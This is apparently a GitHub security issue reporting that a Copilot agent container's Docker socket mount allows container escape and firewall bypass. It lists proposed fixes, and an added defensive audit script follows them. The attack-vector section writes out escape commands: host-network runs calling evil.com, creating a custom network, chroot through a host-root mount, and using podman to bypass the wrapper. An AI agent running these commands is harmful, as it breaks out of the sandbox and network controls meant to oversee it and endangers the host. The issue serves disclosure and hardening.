
[Security] Docker socket access allows container escape and firewall bypass #10

@Mossaka

Priority

Critical

Description

The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.

Attack vectors

1. Bypass docker-wrapper directly

/usr/bin/docker-real run --network host alpine wget https://evil.com

2. Create custom network

docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com

3. Volume mount escape

docker run -v /:/host alpine chroot /host bash

4. Alternative container runtimes

apt-get install podman
podman run --network host alpine wget https://evil.com

Current mitigations (insufficient)

  • docker-wrapper.sh intercepts the docker command but is easily bypassed
  • Host-level iptables rules only filter the awf-net bridge, not custom networks
  • The wrapper blocks --privileged, --network host and --add-host, but these checks can be bypassed

Code locations

  • src/docker-manager.ts:223-224 - Docker socket mount
  • containers/copilot/docker-wrapper.sh - Wrapper script (bypassable)
  • containers/copilot/Dockerfile:34-35 - Symlink setup

Proposed solutions

Option A: Remove Docker socket access (breaking change)

  • Pros: Simplest, most secure
  • Cons: Breaks MCP servers that need Docker (Playwright, etc.)
  • Implementation: Remove the socket mount and document that users must spawn Docker-based MCPs outside the firewall

Option B: Use docker-socket-proxy

Option C: Enforce awf-net for all networks (host-level)

  • Pros: Prevents custom network bypass
  • Cons: Complex iptables rules, doesn't prevent volume escapes
  • Implementation: Add iptables rules to block/filter all Docker networks except awf-net

Option D: AppArmor/SELinux profiles

  • Pros: Fine-grained control
  • Cons: Very complex, platform-specific
  • Implementation: Docker security profiles restricting socket operations

Recommendation

Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.
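As an added defender-side check (example code written for this page, not part of the issue or the project), the audit below walks `docker inspect` output and flags the configurations the attack vectors above rely on: a mounted Docker socket, `--privileged`, `--network host`, attachment to any network other than awf-net, and a bind mount of the host root. The assumption that awf-net is the only sanctioned network is taken from Option C; the sample records are constructed.

```python
"""Audit `docker inspect` records for the settings this issue calls out."""
import json

DOCKER_SOCK = "/var/run/docker.sock"
# Assumption (from Option C): awf-net is the only sanctioned Docker network.
ALLOWED_NETWORKS = {"awf-net", "none"}


def audit_container(info: dict) -> list[str]:
    """Return findings for one `docker inspect` record (only the fields used here)."""
    findings = []
    name = info.get("Name", "?").lstrip("/")
    host = info.get("HostConfig", {})
    mode = host.get("NetworkMode")
    if host.get("Privileged"):
        findings.append(f"{name}: runs --privileged")
    if mode == "host":
        findings.append(f"{name}: uses --network host (not filtered by the awf-net iptables rules)")
    elif mode not in ALLOWED_NETWORKS:
        findings.append(f"{name}: attached to unsanctioned network {mode!r}")
    for mount in info.get("Mounts", []):
        if mount.get("Type") != "bind":
            continue
        src, dst = mount.get("Source", ""), mount.get("Destination", "")
        if src == DOCKER_SOCK:
            # A read-only bind of a unix socket still allows connecting to it,
            # so the RW flag does not reduce the risk; it is reported only for context.
            rw = "rw" if mount.get("RW", True) else "ro"
            findings.append(f"{name}: mounts Docker socket {DOCKER_SOCK} at {dst} ({rw})")
        elif src == "/":
            findings.append(f"{name}: bind-mounts host root at {dst}")
    return findings


def audit_inspect_output(raw: str) -> list[str]:
    """Audit the JSON array produced by `docker inspect $(docker ps -q)`."""
    return [f for c in json.loads(raw) for f in audit_container(c)]


# Constructed sample: three containers, one clean, two with the issue's risky settings.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/copilot", "HostConfig": {"NetworkMode": "awf-net", "Privileged": False},
     "Mounts": [{"Type": "bind", "Source": DOCKER_SOCK, "Destination": DOCKER_SOCK, "RW": True}]},
    {"Name": "/escape", "HostConfig": {"NetworkMode": "host", "Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}]},
    {"Name": "/clean", "HostConfig": {"NetworkMode": "awf-net", "Privileged": False}, "Mounts": []},
])

if __name__ == "__main__":
    for finding in audit_inspect_output(SAMPLE_INSPECT):
        print(finding)
```

Run it against live output with `docker inspect $(docker ps -q) | python audit.py` after swapping the sample for `sys.stdin.read()`; any finding on the copilot container means the socket mount from src/docker-manager.ts is still in place.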

Labels: bug (Something isn't working), enhancement (New feature or request)